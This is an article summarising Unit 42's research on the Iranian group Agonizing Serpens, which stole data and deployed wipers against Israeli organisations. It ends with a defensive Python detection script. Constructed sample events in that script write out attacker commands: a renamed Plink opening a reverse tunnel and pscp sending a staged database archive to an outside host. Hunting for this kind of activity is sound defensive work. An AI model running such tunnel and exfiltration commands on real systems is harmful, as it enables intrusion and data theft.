Iranian APT Group 'Agonizing Serpens' Campaigns for Data Theft and Destruction
Researchers from Unit 42 have detailed a series of cyberattacks by an Iranian threat group, Agonizing Serpens, also tracked under aliases such as Agrius, BlackShadow, Pink Sandstorm, and DEV-0022. These attacks occurred between January 2023 and October 2023 and focused particularly on Israeli organizations, notably within the education and technology sectors. Agonizing Serpens pursued two objectives: data theft, followed by the deployment of destructive data-wiping malware. Unit 42 tracks the wipers used in these attacks as MultiLayer, PartialWasher, and BFG Agonizer.
Agonizing Serpens demonstrated several attack capabilities in its campaigns. Initial access came from exploiting vulnerable public-facing applications to deploy ASPX webshells. After deployment, the attackers used a command-line interpreter for reconnaissance, gathering user, system, and network context. The group employed various techniques for credential theft, including password spraying, brute-force attacks over SMB, credential dumping from the registry, and tools such as Mimikatz. To move laterally within the network, they used a renamed Plink executable, 'system.exe,' to establish communications through remote tunnels. Unit 42 observed multiple attempts by the attackers to circumvent the Cortex XDR platform. These efforts included trying to modify the auto-start services that Cortex XDR relies on, as well as exploiting vulnerable drivers (bring your own vulnerable driver, BYOVD).
Before deploying destructive malware, the threat actors gathered data from the environment, particularly targeting SQL databases. They used a custom tool named 'sql.net4.exe' to extract sensitive information from database tables. The collected data was archived using 7-Zip and staged in the Windows TEMP folder, and exfiltrated with tools such as WinSCP and PuTTY Secure Copy (Pscp.exe). The attackers' deployment of data-wiping malware was meant to cover their tracks and inflict maximum damage on the targeted organization. Unit 42 assessed the destructive nature of Agonizing Serpens' attacks to be "congruent with all previous reports about the group's activity."
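As an added illustration of how a defender might hunt for the tradecraft described above (the renamed Plink binary, 7-Zip archives staged in the Windows TEMP folder, and SCP clients reading from that folder), here is example detection logic written for this page, not Unit 42's tooling; the process-event field names and the sample events are constructed assumptions, not real telemetry from the campaign:

```python
# Heuristic detection over constructed process-creation events modelled on the
# Agonizing Serpens tradecraft described in the article. The event schema
# (image / original_file_name / command_line) is an assumption made here.
import re

# Constructed sample events (not real telemetry from the campaign).
SAMPLE_EVENTS = [
    {"image": r"C:\Users\Public\system.exe", "original_file_name": "plink.exe",
     "command_line": r"system.exe -N -R 8080:127.0.0.1:8080 svc@203.0.113.10"},
    {"image": r"C:\Program Files\7-Zip\7z.exe", "original_file_name": "7z.exe",
     "command_line": r"7z.exe a C:\Windows\Temp\db1.7z C:\staging\export.csv"},
    {"image": r"C:\Tools\pscp.exe", "original_file_name": "pscp.exe",
     "command_line": r"pscp.exe C:\Windows\Temp\db1.7z svc@203.0.113.10:/tmp/"},
    {"image": r"C:\Windows\System32\svchost.exe", "original_file_name": "svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
]

# Archive written to or read from the Windows TEMP folder.
TEMP_ARCHIVE = re.compile(r"\\Windows\\Temp\\[^ ]+\.(7z|zip|rar)", re.IGNORECASE)
# SCP/SFTP clients the report names as exfiltration tools.
EXFIL_TOOLS = {"pscp.exe", "winscp.exe"}


def basename(path):
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, image) findings for events matching the three heuristics."""
    findings = []
    for ev in events:
        image = basename(ev["image"])
        orig = ev.get("original_file_name", "").lower()
        cmd = ev.get("command_line", "")
        # Rule 1: Plink running under a different on-disk name (e.g. system.exe).
        # The PE's original file name survives the rename; the image name does not.
        if orig == "plink.exe" and image != orig:
            findings.append(("renamed_plink", image))
        # Rule 2: 7-Zip writing an archive into TEMP, the staging step before exfil.
        if orig == "7z.exe" and TEMP_ARCHIVE.search(cmd):
            findings.append(("temp_staging", image))
        # Rule 3: an SCP client handed a staged archive from TEMP.
        if orig in EXFIL_TOOLS and TEMP_ARCHIVE.search(cmd):
            findings.append(("temp_exfil", image))
    return findings


if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

Each rule on its own will produce benign hits in some environments; correlating all three on one host within a short window is what makes the sequence distinctive.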